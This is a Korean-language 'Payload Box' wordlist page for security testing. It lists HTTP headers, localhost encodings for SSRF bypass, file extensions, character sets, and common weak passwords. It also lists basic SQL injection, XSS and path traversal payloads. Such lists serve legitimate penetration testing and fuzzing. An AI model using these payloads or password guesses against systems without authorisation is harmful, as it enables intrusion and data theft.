Payload Box

HTTP 헤더

일반적인 HTTP 요청/응답 헤더

Accept
Accept-Encoding
Accept-Language
Authorization
Cache-Control
Connection
Content-Length
Content-Type
Cookie
Host
Origin
Referer
User-Agent
X-Forwarded-For
X-Forwarded-Host
X-Forwarded-Proto
X-Real-IP
X-Requested-With

Localhost 변형

SSRF/우회를 위한 localhost 및 loopback 변형

127.0.0.1
localhost
0.0.0.0
[::1]
[::ffff:127.0.0.1]
[0:0:0:0:0:0:0:1]
[0000:0000:0000:0000:0000:0000:0000:0001]
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
2130706433
127.1
127.0.1
0x7f000001
017700000001

파일 확장자

테스트에 사용되는 일반적인 파일 확장자

php
php3
php4
php5
php7
phtml
phar
asp
aspx
jsp
jspx
html
htm
js
json
xml
txt
pdf
zip
tar
gz
bak
old
tmp
log
conf
config
ini
sql
db
sqlite

소문자 (a-z)

소문자 알파벳 문자

a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z

대문자 (A-Z)

대문자 알파벳 문자

A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z

숫자 (0-9)

한 자리 숫자

ASCII 출력 가능 문자

모든 출력 가능한 ASCII 문자

!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
:
;
<
=
>
?
@
[
\
]
^
_
`
{
|
}
~

SQL Injection

기본 SQL 인젝션 테스트 페이로드

'
"
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 1=1#
" OR 1=1#
admin'--
admin"--
' UNION SELECT NULL--
" UNION SELECT NULL--
' AND 1=1--
" AND 1=1--
' AND 1=2--
" AND 1=2--

XSS 페이로드

기본 XSS 테스트 페이로드

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<iframe src=javascript:alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<div onmouseover=alert(1)>test</div>
<a href="javascript:alert(1)">click</a>
<svg><script>alert(1)</script></svg>
';alert(1);//
";alert(1);//
javascript:alert(1)
<ScRiPt>alert(1)</sCrIpT>
<IMG SRC="javascript:alert(1)">

경로 순회 (Path Traversal)

경로 순회 패턴

../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
..%2f
..%252f
%2e%2e/
%2e%2e%2f
..%5c
..%255c
%2e%2e\
%2e%2e%5c

일반적인 비밀번호

가장 흔한 취약한 비밀번호

password
123456
12345678
qwerty
abc123
admin
letmein
welcome
monkey
1234567890
password1
Password1
admin123
root
toor
guest
test
demo
user
changeme

HTTP 메소드

HTTP 요청 메소드

GET
POST
PUT
DELETE
PATCH
HEAD
OPTIONS
CONNECT
TRACE
TRACK
PROPFIND
PROPPATCH
MKCOL
COPY
MOVE
LOCK
UNLOCK

Wordlist 검색

HTTP 헤더

Localhost 변형

파일 확장자

소문자 (a-z)

대문자 (A-Z)

숫자 (0-9)

ASCII 출력 가능 문자

SQL Injection

XSS 페이로드

경로 순회 (Path Traversal)

일반적인 비밀번호

HTTP 메소드